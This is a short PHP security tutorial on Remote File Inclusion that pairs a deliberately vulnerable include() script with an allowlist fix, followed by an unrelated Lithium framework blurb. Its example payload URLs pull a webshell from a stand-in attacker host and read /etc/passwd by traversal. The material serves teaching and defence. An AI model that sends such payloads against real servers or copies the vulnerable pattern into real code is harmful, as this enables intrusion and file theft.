Friends

How to avoid RFI vulnerability in PHP.

What is RFI?
Remote File Inclusion (RFI) is a type of vulnerability. It allows an attacker to make the web server include a remote file, usually by passing a URL to a script on the server.
In PHP, functions such as "include" and "require" pull other files into the currently executing script. The vulnerability occurs when user-supplied input is passed to these functions without proper validation.

Example
Consider the script below (deliberately vulnerable: the FILE parameter is used as a path without validation):
<?php
   // Default page when no FILE parameter is given
   $file = 'file1';
   // VULNERABLE: the raw request value is used as part of the include path
   if (isset($_GET['FILE']))
      $file = $_GET['FILE'];
   include($file . '.php');
?>
<html>
<body>
<form method="get">
   <input type="checkbox" name="FILE" value="file1"> File 1
   <input type="checkbox" name="FILE" value="file2"> File 2
   <input type="submit">
</form>
</body>
</html>

The developer intended only file1.php and file2.php to be used as options. But because anyone can easily put arbitrary values in FILE, it is possible to inject code from other files:
  • /vulnerable.php?FILE=http://evil.example.com/webshell.txt? - includes a remotely hosted file containing malicious code.
  • /vulnerable.php?FILE=C:\\ftp\\upload\\exploit - executes code from an already uploaded file called exploit.php (a local file inclusion vulnerability).
  • /vulnerable.php?FILE=C:\\notes.txt - example using a NUL meta character to strip the .php suffix, allowing access to files other than .php (with magic_quotes_gpc enabled, special characters are escaped, which disables the NUL terminator and so limits this attack).
  • /vulnerable.php?FILE=/etc/passwd - allows an attacker to read the contents of the passwd file on a UNIX system via directory traversal.
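The fix the post is leading to is to never let the request value reach include() as a path. Below is an added example, not code from the original post, of the same page selector rewritten with an allowlist: the FILE value is only ever used as a lookup key into a fixed table, and the resolved path is additionally checked to sit under the intended directory. It assumes the two pages live in a ./pages/ subdirectory next to the script; the names resolvePage, ALLOWED_PAGES and the pages/ directory are this example's own.

```php
<?php
// Added example (not from the original post): the vulnerable selector
// rewritten so the request parameter never reaches include() directly.
// Assumes the pages live in ./pages/ and are named file1.php and file2.php.

declare(strict_types=1);

// Allowlist: maps the value the browser may send to the file we will load.
// Anything not in this table is rejected, so URLs, drive letters, "../"
// and NUL bytes in FILE are never interpreted as a path at all.
const ALLOWED_PAGES = [
    'file1' => 'file1.php',
    'file2' => 'file2.php',
];

/**
 * Resolve a user-supplied page key to an absolute path inside $baseDir.
 * Returns null when the key is not allowed or the file cannot be resolved.
 */
function resolvePage(string $key, string $baseDir): ?string
{
    if (!array_key_exists($key, ALLOWED_PAGES)) {
        return null;                      // unknown key: refuse, do not guess
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . ALLOWED_PAGES[$key]);
    // Defence in depth: even with an allowlist, confirm the resolved file
    // really lies under the intended directory (guards against a bad table
    // entry or a symlink that points somewhere else).
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

$file = 'file1';                                        // safe default
// is_string() rejects FILE[]=... array tricks before they reach the lookup
if (isset($_GET['FILE']) && is_string($_GET['FILE'])) {
    $file = $_GET['FILE'];
}

$page = resolvePage($file, __DIR__ . '/pages');
if ($page === null) {
    http_response_code(400);
    exit('Unknown page');
}
include $page;                                          // only an allowlisted local file
?>
<html>
<body>
<form method="get">
   <input type="radio" name="FILE" value="file1"> File 1
   <input type="radio" name="FILE" value="file2"> File 2
   <input type="submit">
</form>
</body>
</html>
```

Two points worth noting. First, every one of the four payloads listed above fails at the array_key_exists() check, so no string filtering or suffix stripping is needed; trying to sanitise the path instead of allowlisting it is where the NUL-byte and traversal variants come from. Second, keep allow_url_include set to Off in php.ini (it has been Off by default since PHP 5.2): that blocks the http:// case at the interpreter level, but it does nothing against the local file inclusion variants, which is why the allowlist in the application is still required.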
I think this information will help PHP programmers handle the RFI vulnerability to some extent.

Lithium, the most RAD framework for PHP 5.3+

Lithium, the most RAD framework for PHP 5.3+ is focused on quality, speed, and flexibility. It's a set of no-nonsense philosophies and tools that enable you to build better applications, in less time, without sacrificing quality or extensibility.
Lithium understands distributed storage and caching, queuing systems, micro-dispatch frameworks, with integrated support for document oriented databases like CouchDB and MongoDB, alongside relational databases like MySQL and PostgreSQL.
Lithium's architecture allows you to get your application up and running quickly, and still allows you to take control of the framework to support the requirements of your application.

Check this out for more info
